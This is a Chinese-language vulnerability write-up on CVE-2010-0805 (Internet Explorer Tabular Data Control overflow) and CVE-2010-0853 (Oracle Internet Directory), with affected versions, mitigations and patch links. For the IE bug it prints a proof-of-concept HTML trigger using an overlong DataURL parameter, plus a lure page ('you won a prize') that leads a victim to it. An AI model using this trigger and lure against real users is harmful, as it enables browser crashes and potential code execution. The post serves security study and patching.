cve漏洞分析：cve-2010-0805(附带测试代码） cve-2010-0853

【警告：以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负】

对象1：【附带攻击测试代码和效果演示】

1.      CVE编号：cve-2010-0805

2.      微软漏洞编号：ms10-018

3.      漏洞名称：Microsoft IE Tabular Data Control ActiveX控件远程代码执行漏洞

4.      危害性：可执行远程特殊代码，溢出后获得当前用户权限

5.      危害等级：8

6.      涉及软件：Microsoft IE

7.      受影响版本：

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

相关windows系统：

windows_2000：：SP4

windows_xp::sp1

windows_xp::sp2

windows_xp::sp3

8.      漏洞分析：

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。Internet Explorer的Tabular Data Control ActiveX模块（tdc.ocx）中存在栈破坏漏洞。如果向CTDCCtl::SecurityCHeckDataURL函数传送了超长的DataURL参数，就可以触发这个漏洞，导致向任意内存位置写入单个NULL字节。攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。

9.      临时解决方法：

l  在Office中禁用ActiveX控件。

l  将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。

l  将Internet 和本地Intranet安全区域设置设为“高”，以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

l  不要打开意外的文件或者邮件。

10.  厂商补丁：

Microsoft已经为此发布了一个安全公告（MS10-018）以及相应补丁

MS10-018：Cumulative Security Update for Internet Explorer (980182)链接：http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true。

11.  攻击测试代码：

 

# CVE : CVE-2010-0805 <!-- .text:600058F7                 and     [ebp+pv], 0 .text:600058FE                 lea     eax, [ebp+pv] .text:60005904                 push    eax             ; unsigned __int16 ** .text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite * .text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *) .text:6000590D                 mov     eax, [ebp+var_218] .text:60005913                 push    [ebp+pv]        ; pv .text:60005919                 mov     [ebp+eax+var_204], 0 .text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param .text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address --> <html> <title>Trigger for ZDI-10-034 by ZSploit.com</title> <head> </head> <body> <object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/> </object> </body> </html> 测试代码演示

 

12.  效果演示：

a 搭建环境：

操作系统	1)      Windows xp：：SP2 测试环境 2)      Windows 7 比较环境
IE版本	IE 6.0 / IE8.0
IIS	IIS5.0
虚拟机	Vmware 7

b 测试过程：（只给出可用性攻击）

l  在VM7中装入Windows xp sp2，配置IIS环境。

l  把测试代码写入记事本，保存为任意名称的html文件，如attack.html

l  把attack.html放入 C:/Inetpub/wwwroot目录下(iis的默认目录)

l  做一个普通的html文件price.html，作为诱饵，显示文本为：恭喜你，中奖了！让此文本链接指向attack.html.  

 

l  打开IE浏览器（IE6.0），访问http://localhost/price.html, 点击“ 恭喜你，中奖了！”。 IE崩溃，界面瞬间消失。系统日志记录为：

l  同上在windows7下搭建以上环境，点击诱饵后，IE（IE8）将显示attack.html中的内容，没有出现问题。

 

对象2：

1.      CVE编号：cve-2010-0853

2.      漏洞名称：

Oracle Fusion Middleware CVE-2010-0853 Oracle Internet目录远程漏洞

3.      危害性：拒绝服务、远程代码执行

4.      危害等级：7

5.      涉及软件：Oracle

6.      受影响版本：

Oracle Oracle9i Standard Edition 9.2 .8DV

Oracle Oracle9i Standard Edition 9.2 .8

Oracle Oracle9i Personal Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8.0

Oracle Oracle Identity Management 10g 10.1.4 .0.1

Oracle Application Server 10.1.2.3

7.      漏洞分析：（此漏洞由oracle官方发布，对漏洞技术细节提及较少）

Oracle Fusion Middleware是Oracle 的中间件解决方案组合，用于协助开发、部署及管理SOA和其它应用程序。Oracle Fusion中间件所使用的Oracle Internet Directory和Portal组件中存在安全漏洞，通过认证的远程用户可以通过LDAP和HTTP协议来利用这些漏洞完全入侵数据库系统。

8.      厂商补丁：

Oracle已经为此发布了一个安全公告（cpuapr2010）以及相应补丁:

cpuapr2010：Oracle Critical Patch Update Advisory - April 2010

链接：http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html。